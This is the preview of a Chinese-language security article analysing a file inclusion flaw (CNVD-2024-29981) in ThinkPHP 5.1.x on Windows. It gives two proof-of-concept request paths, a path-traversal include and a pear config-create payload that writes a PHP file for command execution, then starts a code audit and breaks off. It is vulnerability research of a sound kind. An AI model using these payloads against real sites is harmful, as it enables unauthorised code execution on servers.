Thinkphp5.1.0-Thinkphp5.1. 文件包含漏洞（CNVD-2024-29981）

文章预览

声明 ：请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。 Thinkphp5.1.0-Thinkphp5.1.*文件包含漏洞 (CNVD-2024-29981)   time 4.24 测试版本：thinkphp 5.1.41 php: 7.3.4 影响范围：thinkphp5.1.0--thinkphp5.1.* （windows）: linux无法利用 漏洞利用poc: index.php?s=..\..\你要包含的路径/index/index pear进行命令执行poc : /index.php?s=..\..\..\Extensions\php\php7.3.4nts\pear\ & +config-create+/+1.php 调用堆栈：     一.Thinkphp文件包含:   在Thinkphp5中路由可以使用一下两种方式都可以访问到执行的方法中如： http://127.0.0.1/index.php/index/index/hello http://127.0.0.1/index.php?s=index/index/hello 简单一点来说其实就是对应的 模块 /控制器/方法     1.1: Thinkphp5.1.41审计过程   首先需要触发路由 http://127.0.0.1/index.php?s=index/index/hello 进入run方法，     走到405行routeCheck方法，根 ………………………………